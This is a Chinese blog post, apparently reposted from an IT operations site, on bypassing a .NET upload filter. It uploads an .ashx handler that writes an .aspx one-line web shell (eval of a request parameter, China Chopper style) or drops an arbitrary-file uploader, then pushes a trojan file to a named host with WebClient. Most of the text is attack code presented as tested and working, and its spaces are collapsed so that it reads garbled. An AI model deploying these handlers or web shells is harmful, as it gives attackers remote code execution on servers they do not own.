.Net环境,上传处未限制Ashx和Asmx,后者上传无法运行,提示Asmx脚本只能在本地运行,于是打算先传个Ashx脚本然后在当前目录下生成Aspx文件(目标不能执行Asp文件),网上找到如下Ashx代码:
<%@WebHandlerLanguage="C#"Class="Handler"%> usingSystem; usingSystem.Web; usingSystem.IO; publicclassHandler:IHttpHandler{ publicvoidProcessRequest(HttpContextcontext){ context.Response.ContentType="text/plain"; StreamWriterfile1=File.CreateText(context.Server.MapPath("root.aspx")); file1.Write("<%@PageLanguage=\"Jscript\"%><%eval(Request.Item[\"pass\"],\"unsafe\");%>"); file1.Flush(); file1.Close(); } publicboolIsReusable{ get{ returnfalse; } } }
我将脚本中的Asp一句话改成菜刀的Aspx一句话~不过执行的时候爆错,说未知指令@Page。遂采用一下2种方式解决:
1,用String连接字符串
<%@WebHandlerLanguage="C#"Class="Handler"%> usingSystem; usingSystem.Web; usingSystem.IO; publicclassHandler:IHttpHandler{ publicvoidProcessRequest(HttpContextcontext){ context.Response.ContentType="text/plain"; stringshow="<%@PageLanguage=\"Jscript\"%"+"><%eval(Request.Item"+"[\"chopper\"]"+",\"unsafe\");%>"; StreamWriterfile1=File.CreateText(context.Server.MapPath("root.aspx")); file1.Write(show); file1.Flush(); file1.Close(); } publicboolIsReusable{ get{ returnfalse; } } }
2.比较笨的方法,看代码吧
<%@WebHandlerLanguage="C#"Class="Uploader"%> usingSystem; usingSystem.IO; usingSystem.Web; publicclassUploader:IHttpHandler { publicvoidProcessRequest(HttpContexthc) { foreach(stringfileKeyinhc.Request.Files) { HttpPostedFilefile=hc.Request.Files[fileKey]; file.SaveAs(Path.Combine(hc.Server.MapPath("."),file.FileName)); } } publicboolIsReusable { get{returntrue;} } }
然后用VS建立WinForm程序~主函数里写:
System.Net.WebClient myWebClient = new System.Net.WebClient();
myWebClient.UploadFile("http://www.xcnzz.com/Uploader.ashx", "POST", "C:\\ma.aspx");
执行就可以了~以上方法均测试成功~
转载请注明:IT运维空间 » 安全防护 » 揭穿黑客关于Ashx脚本写aspx木马的方法汇总
发表评论